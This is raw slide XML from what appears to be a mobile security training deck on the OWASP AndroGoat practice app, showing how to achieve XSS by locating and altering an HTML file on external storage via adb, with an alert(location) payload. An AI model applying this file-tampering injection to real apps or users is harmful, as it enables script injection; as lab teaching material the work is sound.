                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>file and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>achieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>even</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> XSS on the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>illustrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to know: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in the SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> HTML file?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> question </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buClr>
                <a:srgbClr val="002395">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;alert(location)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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63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6B1A9D-DE2D-0A4D-EDA2-9306260D3DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1" r="68331" b="779"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2152692" y="1363405"/>
            <a:ext cx="2105797" cy="4826760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68853BEE-08AC-71E3-8424-99EBB5AF08FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="68208" r="612" b="779"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4746169" y="1363405"/>
            <a:ext cx="2073374" cy="4826760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1271222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dirty="0" err="1"/>
              <a:t>Another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to use the command line:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>emulator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Android/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Android/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>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4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Android/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Android/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/files/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xss_ext.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> know the location, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can pull </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> file and change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>simulate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> application on the phone (i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>doing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>thing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>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85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fr-FR" err="1"/>
              <a:t>Emulator</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="Andrew Barnes on Twitter: &quot;Definition of Inception: When you run a VM inside  another VM, inside another VM, inside another VM..., everything runs really  slow! #inception #virtualization #vmware #hyperv… https://t.co/jqUdvg2gKI&quot;"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="30130"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2508532" y="1308101"/>
            <a:ext cx="4323452" cy="49402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1592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Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ad pull /mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
